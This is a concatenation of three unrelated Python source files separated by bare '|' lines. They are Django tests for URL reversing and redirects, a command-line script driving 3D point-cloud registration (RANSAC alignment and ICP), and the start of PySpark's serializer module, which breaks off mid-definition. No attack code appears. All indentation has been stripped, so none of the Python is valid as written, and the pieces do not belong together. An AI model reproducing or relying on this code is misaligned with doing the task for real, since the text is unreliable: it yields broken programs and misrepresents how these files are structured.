class ReverseShortcutTests(TestCase):
urls = 'urlpatterns_reverse.urls'
def test_redirect_to_object(self):
# We don't really need a model; just something with a get_absolute_url
class FakeObj(object):
def get_absolute_url(self):
return "/hi-there/"
res = redirect(FakeObj())
self.assertIsInstance(res, HttpResponseRedirect)
self.assertEqual(res.url, '/hi-there/')
res = redirect(FakeObj(), permanent=True)
self.assertIsInstance(res, HttpResponsePermanentRedirect)
self.assertEqual(res.url, '/hi-there/')
def test_redirect_to_view_name(self):
res = redirect('hardcoded2')
self.assertEqual(res.url, '/hardcoded/doc.pdf')
res = redirect('places', 1)
self.assertEqual(res.url, '/places/1/')
res = redirect('headlines', year='2008', month='02', day='17')
self.assertEqual(res.url, '/headlines/2008.02.17/')
self.assertRaises(NoReverseMatch, redirect, 'not-a-view')
def test_redirect_to_url(self):
res = redirect('/foo/')
self.assertEqual(res.url, '/foo/')
res = redirect('http://example.com/')
self.assertEqual(res.url, 'http://example.com/')
def test_redirect_view_object(self):
from .views import absolute_kwargs_view
res = redirect(absolute_kwargs_view)
self.assertEqual(res.url, '/absolute_arg_view/')
self.assertRaises(NoReverseMatch, redirect, absolute_kwargs_view, wrong_argument=None)
class NamespaceTests(TestCase):
urls = 'urlpatterns_reverse.namespace_urls'
def test_ambiguous_object(self):
"Names deployed via dynamic URL objects that require namespaces can't be resolved"
self.assertRaises(NoReverseMatch, reverse, 'urlobject-view')
self.assertRaises(NoReverseMatch, reverse, 'urlobject-view', args=[37,42])
self.assertRaises(NoReverseMatch, reverse, 'urlobject-view', kwargs={'arg1':42, 'arg2':37})
def test_ambiguous_urlpattern(self):
"Names deployed via dynamic URL objects that require namespaces can't be resolved"
self.assertRaises(NoReverseMatch, reverse, 'inner-nothing')
self.assertRaises(NoReverseMatch, reverse, 'inner-nothing', args=[37,42])
self.assertRaises(NoReverseMatch, reverse, 'inner-nothing', kwargs={'arg1':42, 'arg2':37})
def test_non_existent_namespace(self):
"Non-existent namespaces raise errors"
self.assertRaises(NoReverseMatch, reverse, 'blahblah:urlobject-view')
self.assertRaises(NoReverseMatch, reverse, 'test-ns1:blahblah:urlobject-view')
def test_normal_name(self):
"Normal lookups work as expected"
self.assertEqual('/normal/', reverse('normal-view'))
self.assertEqual('/normal/37/42/', reverse('normal-view', args=[37,42]))
self.assertEqual('/normal/42/37/', reverse('normal-view', kwargs={'arg1':42, 'arg2':37}))
self.assertEqual('/+%5C$*/', reverse('special-view'))
def test_simple_included_name(self):
"Normal lookups work on names included from other patterns"
self.assertEqual('/included/normal/', reverse('inc-normal-view'))
self.assertEqual('/included/normal/37/42/', reverse('inc-normal-view', args=[37,42]))
self.assertEqual('/included/normal/42/37/', reverse('inc-normal-view', kwargs={'arg1':42, 'arg2':37}))
self.assertEqual('/included/+%5C$*/', reverse('inc-special-view'))
def test_namespace_object(self):
"Dynamic URL objects can be found using a namespace"
self.assertEqual('/test1/inner/', reverse('test-ns1:urlobject-view'))
self.assertEqual('/test1/inner/37/42/', reverse('test-ns1:urlobject-view', args=[37,42]))
self.assertEqual('/test1/inner/42/37/', reverse('test-ns1:urlobject-view', kwargs={'arg1':42, 'arg2':37}))
self.assertEqual('/test1/inner/+%5C$*/', reverse('test-ns1:urlobject-special-view'))
def test_embedded_namespace_object(self):
"Namespaces can be installed anywhere in the URL pattern tree"
self.assertEqual('/included/test3/inner/', reverse('test-ns3:urlobject-view'))
self.assertEqual('/included/test3/inner/37/42/', reverse('test-ns3:urlobject-view', args=[37,42]))
self.assertEqual('/included/test3/inner/42/37/', reverse('test-ns3:urlobject-view', kwargs={'arg1':42, 'arg2':37}))
self.assertEqual('/included/test3/inner/+%5C$*/', reverse('test-ns3:urlobject-special-view'))
def test_namespace_pattern(self):
"Namespaces can be applied to include()'d urlpatterns"
self.assertEqual('/ns-included1/normal/', reverse('inc-ns1:inc-normal-view'))
self.assertEqual('/ns-included1/normal/37/42/', reverse('inc-ns1:inc-normal-view', args=[37,42]))
self.assertEqual('/ns-included1/normal/42/37/', reverse('inc-ns1:inc-normal-view', kwargs={'arg1':42, 'arg2':37}))
self.assertEqual('/ns-included1/+%5C$*/', reverse('inc-ns1:inc-special-view'))
def test_namespace_pattern_with_variable_prefix(self):
"When using a include with namespaces when there is a regex variable in front of it"
self.assertEqual('/ns-outer/42/normal/', reverse('inc-outer:inc-normal-view', kwargs={'outer':42}))
self.assertEqual('/ns-outer/42/normal/', reverse('inc-outer:inc-normal-view', args=[42]))
self.assertEqual('/ns-outer/42/normal/37/4/', reverse('inc-outer:inc-normal-view', kwargs={'outer':42, 'arg1': 37, 'arg2': 4}))
self.assertEqual('/ns-outer/42/normal/37/4/', reverse('inc-outer:inc-normal-view', args=[42, 37, 4]))
self.assertEqual('/ns-outer/42/+%5C$*/', reverse('inc-outer:inc-special-view', kwargs={'outer':42}))
self.assertEqual('/ns-outer/42/+%5C$*/', reverse('inc-outer:inc-special-view', args=[42]))
def test_multiple_namespace_pattern(self):
"Namespaces can be embedded"
self.assertEqual('/ns-included1/test3/inner/', reverse('inc-ns1:test-ns3:urlobject-view'))
self.assertEqual('/ns-included1/test3/inner/37/42/', reverse('inc-ns1:test-ns3:urlobject-view', args=[37,42]))
self.assertEqual('/ns-included1/test3/inner/42/37/', reverse('inc-ns1:test-ns3:urlobject-view', kwargs={'arg1':42, 'arg2':37}))
self.assertEqual('/ns-included1/test3/inner/+%5C$*/', reverse('inc-ns1:test-ns3:urlobject-special-view'))
def test_nested_namespace_pattern(self):
"Namespaces can be nested"
self.assertEqual('/ns-included1/ns-included4/ns-included1/test3/inner/', reverse('inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-view'))
self.assertEqual('/ns-included1/ns-included4/ns-included1/test3/inner/37/42/', reverse('inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-view', args=[37,42]))
self.assertEqual('/ns-included1/ns-included4/ns-included1/test3/inner/42/37/', reverse('inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-view', kwargs={'arg1':42, 'arg2':37}))
self.assertEqual('/ns-included1/ns-included4/ns-included1/test3/inner/+%5C$*/', reverse('inc-ns1:inc-ns4:inc-ns1:test-ns3:urlobject-special-view'))
def test_app_lookup_object(self):
"A default application namespace can be used for lookup"
self.assertEqual('/default/inner/', reverse('testapp:urlobject-view'))
self.assertEqual('/default/inner/37/42/', reverse('testapp:urlobject-view', args=[37,42]))
self.assertEqual('/default/inner/42/37/', reverse('testapp:urlobject-view', kwargs={'arg1':42, 'arg2':37}))
self.assertEqual('/default/inner/+%5C$*/', reverse('testapp:urlobject-special-view'))
def test_app_lookup_object_with_default(self):
"A default application namespace is sensitive to the 'current' app can be used for lookup"
self.assertEqual('/included/test3/inner/', reverse('testapp:urlobject-view', current_app='test-ns3'))
self.assertEqual('/included/test3/inner/37/42/', reverse('testapp:urlobject-view', args=[37,42], current_app='test-ns3'))
self.assertEqual('/included/test3/inner/42/37/', reverse('testapp:urlobject-view', kwargs={'arg1':42, 'arg2':37}, current_app='test-ns3'))
self.assertEqual('/included/test3/inner/+%5C$*/', reverse('testapp:urlobject-special-view', current_app='test-ns3'))
def test_app_lookup_object_without_default(self):
"An application namespace without a default is sensitive to the 'current' app can be used for lookup"
self.assertEqual('/other2/inner/', reverse('nodefault:urlobject-view'))
self.assertEqual('/other2/inner/37/42/', reverse('nodefault:urlobject-view', args=[37,42]))
self.assertEqual('/other2/inner/42/37/', reverse('nodefault:urlobject-view', kwargs={'arg1':42, 'arg2':37}))
self.assertEqual('/other2/inner/+%5C$*/', reverse('nodefault:urlobject-special-view'))
self.assertEqual('/other1/inner/', reverse('nodefault:urlobject-view', current_app='other-ns1'))
self.assertEqual('/other1/inner/37/42/', reverse('nodefault:urlobject-view', args=[37,42], current_app='other-ns1'))
self.assertEqual('/other1/inner/42/37/', reverse('nodefault:urlobject-view', kwargs={'arg1':42, 'arg2':37}, current_app='other-ns1'))
self.assertEqual('/other1/inner/+%5C$*/', reverse('nodefault:urlobject-special-view', current_app='other-ns1'))
def test_special_chars_namespace(self):
self.assertEqual('/+%5C$*/included/normal/', reverse('special:inc-normal-view'))
self.assertEqual('/+%5C$*/included/normal/37/42/', reverse('special:inc-normal-view', args=[37,42]))
self.assertEqual('/+%5C$*/included/normal/42/37/', reverse('special:inc-normal-view', kwargs={'arg1':42, 'arg2':37}))
self.assertEqual('/+%5C$*/included/+%5C$*/', reverse('special:inc-special-view'))
def test_namespaces_with_variables(self):
"Namespace prefixes can capture variables: see #15900"
self.assertEqual('/inc70/', reverse('inc-ns5:inner-nothing', kwargs={'outer': '70'}))
self.assertEqual('/inc78/extra/foobar/', reverse('inc-ns5:inner-extra', kwargs={'outer':'78', 'extra':'foobar'}))
self.assertEqual('/inc70/', reverse('inc-ns5:inner-nothing', args=['70']))
self.assertEqual('/inc78/extra/foobar/', reverse('inc-ns5:inner-extra', args=['78','foobar']))
class RequestURLconfTests(TestCase):
def setUp(self):
self.root_urlconf = settings.ROOT_URLCONF
self.middleware_classes = settings.MIDDLEWARE_CLASSES
settings.ROOT_URLCONF = urlconf_outer.__name__
def tearDown(self):
settings.ROOT_URLCONF = self.root_urlconf
settings.MIDDLEWARE_CLASSES = self.middleware_classes
def test_urlconf(self):
response = self.client.get('/test/me/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, b'outer:/test/me/,'
b'inner:/inner_urlconf/second_test/')
response = self.client.get('/inner_urlconf/second_test/')
self.assertEqual(response.status_code, 200)
response = self.client.get('/second_test/')
self.assertEqual(response.status_code, 404)
def test_urlconf_overridden(self):
settings.MIDDLEWARE_CLASSES += (
'%s.ChangeURLconfMiddleware' % middleware.__name__,
)
response = self.client.get('/test/me/')
self.assertEqual(response.status_code, 404)
response = self.client.get('/inner_urlconf/second_test/')
self.assertEqual(response.status_code, 404)
response = self.client.get('/second_test/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, b'outer:,inner:/second_test/')
def test_urlconf_overridden_with_null(self):
settings.MIDDLEWARE_CLASSES += (
'%s.NullChangeURLconfMiddleware' % middleware.__name__,
)
self.assertRaises(ImproperlyConfigured, self.client.get, '/test/me/')
def test_reverse_inner_in_response_middleware(self):
"""
Test reversing an URL from the *overridden* URLconf from inside
a response middleware.
"""
settings.MIDDLEWARE_CLASSES += (
'%s.ChangeURLconfMiddleware' % middleware.__name__,
'%s.ReverseInnerInResponseMiddleware' % middleware.__name__,
)
response = self.client.get('/second_test/')
self.assertEqual(response.status_code, 200)
self.assertEqual(response.content, b'/second_test/')
def test_reverse_outer_in_response_middleware(self):
"""
Test reversing an URL from the *default* URLconf from inside
a response middleware.
"""
settings.MIDDLEWARE_CLASSES += (
'%s.ChangeURLconfMiddleware' % middleware.__name__,
'%s.ReverseOuterInResponseMiddleware' % middleware.__name__,
)
message = "Reverse for 'outer' with arguments '()' and keyword arguments '{}' not found."
with self.assertRaisesMessage(NoReverseMatch, message):
self.client.get('/second_test/')
def test_reverse_inner_in_streaming(self):
"""
Test reversing an URL from the *overridden* URLconf from inside
a streaming response.
"""
settings.MIDDLEWARE_CLASSES += (
'%s.ChangeURLconfMiddleware' % middleware.__name__,
'%s.ReverseInnerInStreaming' % middleware.__name__,
)
response = self.client.get('/second_test/')
self.assertEqual(response.status_code, 200)
self.assertEqual(b''.join(response), b'/second_test/')
def test_reverse_outer_in_streaming(self):
"""
Test reversing an URL from the *default* URLconf from inside
a streaming response.
"""
settings.MIDDLEWARE_CLASSES += (
'%s.ChangeURLconfMiddleware' % middleware.__name__,
'%s.ReverseOuterInStreaming' % middleware.__name__,
)
message = "Reverse for 'outer' with arguments '()' and keyword arguments '{}' not found."
with self.assertRaisesMessage(NoReverseMatch, message):
self.client.get('/second_test/')
b''.join(self.client.get('/second_test/'))
class ErrorHandlerResolutionTests(TestCase):
"""Tests for handler400, handler404 and handler500"""
def setUp(self):
from django.core.urlresolvers import RegexURLResolver
urlconf = 'urlpatterns_reverse.urls_error_handlers'
urlconf_callables = 'urlpatterns_reverse.urls_error_handlers_callables'
self.resolver = RegexURLResolver(r'^$', urlconf)
self.callable_resolver = RegexURLResolver(r'^$', urlconf_callables)
def test_named_handlers(self):
from .views import empty_view
handler = (empty_view, {})
self.assertEqual(self.resolver.resolve400(), handler)
self.assertEqual(self.resolver.resolve404(), handler)
self.assertEqual(self.resolver.resolve500(), handler)
def test_callable_handers(self):
from .views import empty_view
handler = (empty_view, {})
self.assertEqual(self.callable_resolver.resolve400(), handler)
self.assertEqual(self.callable_resolver.resolve404(), handler)
self.assertEqual(self.callable_resolver.resolve500(), handler)
class DefaultErrorHandlerTests(TestCase):
urls = 'urlpatterns_reverse.urls_without_full_import'
def test_default_handler(self):
"If the urls.py doesn't specify handlers, the defaults are used"
try:
response = self.client.get('/test/')
self.assertEqual(response.status_code, 404)
except AttributeError:
self.fail("Shouldn't get an AttributeError due to undefined 404 handler")
try:
self.assertRaises(ValueError, self.client.get, '/bad_view/')
except AttributeError:
self.fail("Shouldn't get an AttributeError due to undefined 500 handler")
class NoRootUrlConfTests(TestCase):
"""Tests for handler404 and handler500 if urlconf is None"""
urls = None
def test_no_handler_exception(self):
self.assertRaises(ImproperlyConfigured, self.client.get, '/test/me/')
class ResolverMatchTests(TestCase):
urls = 'urlpatterns_reverse.namespace_urls'
def test_urlpattern_resolve(self):
for path, name, app_name, namespace, func, args, kwargs in resolve_test_data:
# Test legacy support for extracting "function, args, kwargs"
match_func, match_args, match_kwargs = resolve(path)
self.assertEqual(match_func, func)
self.assertEqual(match_args, args)
self.assertEqual(match_kwargs, kwargs)
# Test ResolverMatch capabilities.
match = resolve(path)
self.assertEqual(match.__class__, ResolverMatch)
self.assertEqual(match.url_name, name)
self.assertEqual(match.args, args)
self.assertEqual(match.kwargs, kwargs)
self.assertEqual(match.app_name, app_name)
self.assertEqual(match.namespace, namespace)
self.assertEqual(match.func, func)
# ... and for legacy purposes:
self.assertEqual(match[0], func)
self.assertEqual(match[1], args)
self.assertEqual(match[2], kwargs)
def test_resolver_match_on_request(self):
response = self.client.get('/resolver_match/')
resolver_match = response.resolver_match
self.assertEqual(resolver_match.url_name, 'test-resolver-match')
def test_resolver_match_on_request_before_resolution(self):
request = HttpRequest()
self.assertIsNone(request.resolver_match)
class ErroneousViewTests(TestCase):
urls = 'urlpatterns_reverse.erroneous_urls'
def test_erroneous_resolve(self):
self.assertRaises(ImportError, self.client.get, '/erroneous_inner/')
self.assertRaises(ImportError, self.client.get, '/erroneous_outer/')
self.assertRaises(ViewDoesNotExist, self.client.get, '/missing_inner/')
self.assertRaises(ViewDoesNotExist, self.client.get, '/missing_outer/')
self.assertRaises(ViewDoesNotExist, self.client.get, '/uncallable/')
def test_erroneous_reverse(self):
"""
Ensure that a useful exception is raised when a regex is invalid in the
URLConf.
Refs #6170.
"""
# The regex error will be hit before NoReverseMatch can be raised
self.assertRaises(ImproperlyConfigured, reverse, 'whatever blah blah')
class ViewLoadingTests(TestCase):
def test_view_loading(self):
# A missing view (identified by an AttributeError) should raise
# ViewDoesNotExist, ...
six.assertRaisesRegex(self, ViewDoesNotExist, ".*View does not exist in.*",
get_callable,
'urlpatterns_reverse.views.i_should_not_exist')
# ... but if the AttributeError is caused by something else don't
# swallow it.
self.assertRaises(AttributeError, get_callable,
'urlpatterns_reverse.views_broken.i_am_broken')
|
|
#!/usr/bin/env python
# encoding: utf-8
"""
Author: Isabel Restrepo
A script that encapsulates 3d-registration algorithms in the PVM
September 12, 2012
"""
import os, sys, argparse
sys.path.append(os.pardir)
import reg3d
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--root_dir", action="store", type=str,
dest="root_dir",
default="",
help="Path to root directory - where all sites are")
parser.add_argument("--site", action="store", type=str,
dest="site",
default="",
help="Name of the scene e.g downtown")
parser.add_argument("--src_str", action="store", type=str,
dest="src_str",
default="",
help="Identifying string for source site e.g 2011")
parser.add_argument("--tgt_str", action="store", type=str,
dest="tgt_str",
default="",
help="Identifying string for target site e.g 2011")
parser.add_argument("--reg_ia", action="store_true",
dest="reg_ia",
help="Run initial alignment")
parser.add_argument("--reg_icp", action="store_true",
dest="reg_icp",
help="Run ICP")
parser.add_argument("--vis_ia", action="store_true",
dest="vis_ia",
help="Visualize initial alignment")
parser.add_argument("--vis_icp", action="store_true",
dest="vis_icp",
help="Visualize ICP")
parser.add_argument("--plot_Terror", action="store_true",
dest="plot_Terror",
help="Plot Transformation errors")
parser.add_argument("--descriptor", action="store", type=str,
dest="descriptor", default="FPFH",
help="Trial number")
parser.add_argument("--basename_in", action="store", type=str,
dest="basename_in", default="gauss_233_normals_pvn",
help="string identifying .ply eg gauss_233_normals_pvn")
parser.add_argument("--cropped", action="store_true",
dest="cropped",
help="Are we using a cropped version?")
parser.add_argument("--rej_normals", action="store_true",
dest="rej_normals",
help="Reject normals?")
parser.add_argument("--compute_scale", action="store_true",
dest="compute_scale",
help="compute scale? or read it from gt_transfomation")
parser.add_argument("--bound_scale", action="store_true",
dest="bound_scale",
help="set upper and lower bound for scale")
parser.add_argument("--bound_percentile", action="store", type=int,
dest="bound_percentile", default=1,
help="bound_percentile (on scale) to use")
parser.add_argument("--verbose", action="store_true",
dest="verbose",
help="Print or redirect to log file")
parser.add_argument("--n_iter", action="store", type=int,
dest="n_iter", default=200,
help="Number of iterations")
parser.add_argument("--nsamples", action="store", type=int,
dest="nsamples", default=3,
help="Number of iterations")
parser.add_argument("--sample_distance", action="store", type=int,
dest="sample_distance", default=1,
help="Min. RANSAC sample distance = this*radius*resolution")
parser.add_argument("--geo", action="store_true",
dest="geo",
help="Use reoregistered clouds?")
parser.add_argument("--percentile", action="store", type=int,
dest="percentile", default=99,
help="percentile to use")
args = parser.parse_args()
print args
gt_root_dir = args.root_dir + "/" + args.site + "_" + args.tgt_str + "/original"
trial_root_dir = args.root_dir + "/" + args.site + "_" + args.src_str + "/original"
descriptor_type = args.descriptor
gt_fname = args.src_str + "-" + args.tgt_str + "_Hs.txt"
radius = 30
percentile = args.percentile
verbose = args.verbose
descriptor_string = "descriptors"
aux_output_string = args.src_str + "-" + args.src_str
# aux_output_string = args.src_str + "-" + args.src_str #+ "_" + str(args.nsamples) + "_" + str(args.sample_distance)
#Note: when I run the experiment the output files were labeled by mistake src-src
# this is the correct name
if args.compute_scale:
aux_output_string = args.src_str + "-" + args.tgt_str + "_" + str(args.nsamples) + "_" + str(args.sample_distance)
if args.cropped:
descriptor_string = descriptor_string + "_cropped"
aux_output_string = aux_output_string + "-cropped"
print descriptor_string, aux_output_string
if args.compute_scale:
aux_output_string = aux_output_string + "_scale"
if args.bound_scale:
aux_output_string = aux_output_string + "_bound_" + str(args.bound_percentile)
print descriptor_string, aux_output_string
if args.reg_ia:
print "Running IA"
ransac_scale, avg_scale = reg3d.register_ia(gt_root_dir = gt_root_dir,
trial_root_dir = trial_root_dir,
descriptor_type = descriptor_type,
radius = radius,
percentile = percentile,
nr_iterations = args.n_iter,
nsamples = args.nsamples,
sample_distance = args.sample_distance,
compute_scale = args.compute_scale,
bound_scale = args.bound_scale,
bound_percentile = args.bound_percentile,
verbose = verbose,
aux_output_string = aux_output_string,
descriptor_string = descriptor_string,
basename_in = args.basename_in,
gt_fname = gt_fname)
print "ransac_scale: ", ransac_scale
print "avg_scale: ", avg_scale
# if args.compute_scale:
# reg3d.register_ia(gt_root_dir = gt_root_dir,
# trial_root_dir = trial_root_dir,
# descriptor_type = descriptor_type,
# radius = radius,
# percentile = percentile,
# nr_iterations = args.n_iter,
# nsamples = 3,
# sample_distance = 1,
# compute_scale = False,
# verbose = verbose,
# aux_output_string = aux_output_string + "_sac",
# descriptor_string = descriptor_string,
# basename_in = args.basename_in,
# gt_fname = gt_fname,
# scale = ransac_scale)
if args.reg_icp:
print "Running ICP"
reg3d.register_icp(gt_root_dir = gt_root_dir,
trial_root_dir = trial_root_dir,
descriptor_type = descriptor_type,
radius = radius,
percentile = percentile,
nr_iterations = args.n_iter,
compute_scale = args.compute_scale,
use_max_nr_iter = True,
verbose = verbose,
aux_output_string = aux_output_string,
descriptor_string = descriptor_string,
basename_in = args.basename_in)
# if args.compute_scale:
# reg3d.register_icp(gt_root_dir = gt_root_dir,
# trial_root_dir = trial_root_dir,
# descriptor_type = descriptor_type,
# radius = radius,
# percentile = percentile,
# nr_iterations = args.n_iter,
# compute_scale = args.compute_scale,
# use_max_nr_iter = True,
# verbose = verbose,
# aux_output_string = aux_output_string + "_sac",
# descriptor_string = descriptor_string,
# basename_in = args.basename_in)
if args.vis_ia:
print "Visualizing IA"
reg3d.visualize_reg_ia(gt_root_dir, trial_root_dir,
descriptor_type, radius,
percentile, args.n_iter, args.geo, aux_output_string, args.basename_in)
# reg3d.visualize_reg_ia(gt_root_dir, trial_root_dir,
# descriptor_type, radius,
# percentile, args.n_iter, args.geo, aux_output_string + "_sac", args.basename_in)
if args.vis_icp:
print "Visualizing ICP"
reg3d.visualize_reg_icp(gt_root_dir, trial_root_dir,
descriptor_type, radius,
percentile, args.n_iter, args.rej_normals, args.geo,
aux_output_string, args.basename_in)
if args.plot_Terror:
print "Saving Terror plots"
import compute_transformation_error as TE
TE.main()
import plot_ICP_iterations
plot_ICP_iterations.main()
import compute_trans_geo_accuracy as TE_GEO
TE_GEO.main()
|
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
PySpark supports custom serializers for transferring data; this can improve
performance.
By default, PySpark uses :class:`PickleSerializer` to serialize objects using Python's
`cPickle` serializer, which can serialize nearly any Python object.
Other serializers, like :class:`MarshalSerializer`, support fewer datatypes but can be
faster.
The serializer is chosen when creating :class:`SparkContext`:
>>> from pyspark.context import SparkContext
>>> from pyspark.serializers import MarshalSerializer
>>> sc = SparkContext('local', 'test', serializer=MarshalSerializer())
>>> sc.parallelize(list(range(1000))).map(lambda x: 2 * x).take(10)
[0, 2, 4, 6, 8, 10, 12, 14, 16, 18]
>>> sc.stop()
PySpark serializes objects in batches; by default, the batch size is chosen based
on the size of objects and is also configurable by SparkContext's `batchSize`
parameter:
>>> sc = SparkContext('local', 'test', batchSize=2)
>>> rdd = sc.parallelize(range(16), 4).map(lambda x: x)
Behind the scenes, this creates a JavaRDD with four partitions, each of
which contains two batches of two objects:
>>> rdd.glom().collect()
[[0, 1, 2, 3], [4, 5, 6, 7], [8, 9, 10, 11], [12, 13, 14, 15]]
>>> int(rdd._jrdd.count())
8
>>> sc.stop()
"""
import sys
from itertools import chain, product
import marshal
import struct
import types
import collections
import zlib
import itertools
import pickle
pickle_protocol = pickle.HIGHEST_PROTOCOL
from pyspark import cloudpickle
from pyspark.util import print_exec
__all__ = ["PickleSerializer", "MarshalSerializer", "UTF8Deserializer"]
class SpecialLengths(object):
END_OF_DATA_SECTION = -1
PYTHON_EXCEPTION_THROWN = -2
TIMING_DATA = -3
END_OF_STREAM = -4
NULL = -5
START_ARROW_STREAM = -6
class Serializer(object):
def dump_stream(self, iterator, stream):
"""
Serialize an iterator of objects to the output stream.
"""
raise NotImplementedError
def load_stream(self, stream):
"""
Return an iterator of deserialized objects from the input stream.
"""
raise NotImplementedError
def _load_stream_without_unbatching(self, stream):
"""
Return an iterator of deserialized batches (iterable) of objects from the input stream.
If the serializer does not operate on batches the default implementation returns an
iterator of single element lists.
"""
return map(lambda x: [x], self.load_stream(stream))
# Note: our notion of "equality" is that output generated by
# equal serializers can be deserialized using the same serializer.
# This default implementation handles the simple cases;
# subclasses should override __eq__ as appropriate.
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "%s()" % self.__class__.__name__
def __hash__(self):
return hash(str(self))
class FramedSerializer(Serializer):
"""
Serializer that writes objects as a stream of (length, data) pairs,
where `length` is a 32-bit integer and data is `length` bytes.
"""
def dump_stream(self, iterator, stream):
for obj in iterator:
self._write_with_length(obj, stream)
def load_stream(self, stream):
while True:
try:
yield self._read_with_length(stream)
except EOFError:
return
def _write_with_length(self, obj, stream):
serialized = self.dumps(obj)
if serialized is None:
raise ValueError("serialized value should not be None")
if len(serialized) > (1 << 31):
raise ValueError("can not serialize object larger than 2G")
write_int(len(serialized), stream)
stream.write(serialized)
def _read_with_length(self, stream):
length = read_int(stream)
if length == SpecialLengths.END_OF_DATA_SECTION:
raise EOFError
elif length == SpecialLengths.NULL:
return None
obj = stream.read(length)
if len(obj) < length:
raise EOFError
return self.loads(obj)
def dumps(self, obj):
"""
Serialize an object into a byte array.
When batching is used, this will be called with an array of objects.
"""
raise NotImplementedError
def loads(self, obj):
"""
Deserialize an object from a byte array.
"""
raise NotImplementedError
class BatchedSerializer(Serializer):
"""
Serializes a stream of objects in batches by calling its wrapped
Serializer with streams of objects.
"""
UNLIMITED_BATCH_SIZE = -1
UNKNOWN_BATCH_SIZE = 0
def __init__(self, serializer, batchSize=UNLIMITED_BATCH_SIZE):
self.serializer = serializer
self.batchSize = batchSize
def _batched(self, iterator):
if self.batchSize == self.UNLIMITED_BATCH_SIZE:
yield list(iterator)
elif hasattr(iterator, "__len__") and hasattr(iterator, "__getslice__"):
n = len(iterator)
for i in range(0, n, self.batchSize):
yield iterator[i: i + self.batchSize]
else:
items = []
count = 0
for item in iterator:
items.append(item)
count += 1
if count == self.batchSize:
yield items
items = []
count = 0
if items:
yield items
def dump_stream(self, iterator, stream):
self.serializer.dump_stream(self._batched(iterator), stream)
def load_stream(self, stream):
return chain.from_iterable(self._load_stream_without_unbatching(stream))
def _load_stream_without_unbatching(self, stream):
return self.serializer.load_stream(stream)
def __repr__(self):
return "BatchedSerializer(%s, %d)" % (str(self.serializer), self.batchSize)
class FlattenedValuesSerializer(BatchedSerializer):
"""
Serializes a stream of list of pairs, split the list of values
which contain more than a certain number of objects to make them
have similar sizes.
"""
def __init__(self, serializer, batchSize=10):
BatchedSerializer.__init__(self, serializer, batchSize)
def _batched(self, iterator):
n = self.batchSize
for key, values in iterator:
for i in range(0, len(values), n):
yield key, values[i:i + n]
def load_stream(self, stream):
return self.serializer.load_stream(stream)
def __repr__(self):
return "FlattenedValuesSerializer(%s, %d)" % (self.serializer, self.batchSize)
class AutoBatchedSerializer(BatchedSerializer):
"""
Choose the size of batch automatically based on the size of object
"""
def __init__(self, serializer, bestSize=1 << 16):
BatchedSerializer.__init__(self, serializer, self.UNKNOWN_BATCH_SIZE)
self.bestSize = bestSize
def dump_stream(self, iterator, stream):
batch, best = 1, self.bestSize
iterator = iter(iterator)
while True:
vs = list(itertools.islice(iterator, batch))
if not vs:
break
bytes = self.serializer.dumps(vs)
write_int(len(bytes), stream)
stream.write(bytes)
size = len(bytes)
if size < best:
batch *= 2
elif size > best * 10 and batch > 1:
batch //= 2
def __repr__(self):
return "AutoBatchedSerializer(%s)" % self.serializer
class CartesianDeserializer(Serializer):
"""
Deserializes the JavaRDD cartesian() of two PythonRDDs.
Due to pyspark batching we cannot simply use the result of the Java RDD cartesian,
we additionally need to do the cartesian within each pair of batches.
"""
def __init__(self, key_ser, val_ser):
self.key_ser = key_ser
self.val_ser = val_ser
def _load_stream_without_unbatching(self, stream):
key_batch_stream = self.key_ser._load_stream_without_unbatching(stream)
val_batch_stream = self.val_ser._load_stream_without_unbatching(stream)
for (key_batch, val_batch) in zip(key_batch_stream, val_batch_stream):
# for correctness with repeated cartesian/zip this must be returned as one batch
yield product(key_batch, val_batch)
def load_stream(self, stream):
return chain.from_iterable(self._load_stream_without_unbatching(stream))
def __repr__(self):
return "CartesianDeserializer(%s, %s)" % \
(str(self.key_ser), str(self.val_ser))
class PairDeserializer(Serializer):
"""
Deserializes the JavaRDD zip() of two PythonRDDs.
Due to pyspark batching we cannot simply use the result of the Java RDD zip,
we additionally need to do the zip within each pair of batches.
"""
def __init__(self, key_ser, val_ser):
self.key_ser = key_ser
self.val_ser = val_ser
def _load_stream_without_unbatching(self, stream):
key_batch_stream = self.key_ser._load_stream_without_unbatching(stream)
val_batch_stream = self.val_ser._load_stream_without_unbatching(stream)
for (key_batch, val_batch) in zip(key_batch_stream, val_batch_stream):
# For double-zipped RDDs, the batches can be iterators from other PairDeserializer,
# instead of lists. We need to convert them to lists if needed.
key_batch = key_batch if hasattr(key_batch, '__len__') else list(key_batch)
val_batch = val_batch if hasattr(val_batch, '__len__') else list(val_batch)
if len(key_batch) != len(val_batch):
raise ValueError("Can not deserialize PairRDD with different number of items"
" in batches: (%d, %d)" % (len(key_batch), len(val_batch)))
# for correctness with repeated cartesian/zip this must be returned as one batch
yield zip(key_batch, val_batch)
def load_stream(self, stream):
return chain.from_iterable(self._load_stream_without_unbatching(stream))
def __repr__(self):
return "PairDeserializer(%s, %s)" % (str(self.key_ser), str(self.val_ser))
class NoOpSerializer(FramedSerializer):
def loads(self, obj):
return obj
def dumps(self, obj):
return obj
# Hack namedtuple, make it picklable
__cls = {}
def _restore(name, fields, value):
""" Restore an object of namedtuple"""
k = (name, fields)
cls = __cls.get(k)
if cls is None:
cls = collections.namedtuple(name, fields)
__cls[k] = cls
return cls(*value)
def _hack_namedtuple(cls):
""" Make class generated by namedtuple picklable """
name = cls.__name__
fields = cls._fields
def __reduce__(self):
return (_restore, (name, fields, tuple(self)))
cls.__reduce__ = __reduce__
cls._is_namedtuple_ = True
return cls
def _hijack_namedtuple():
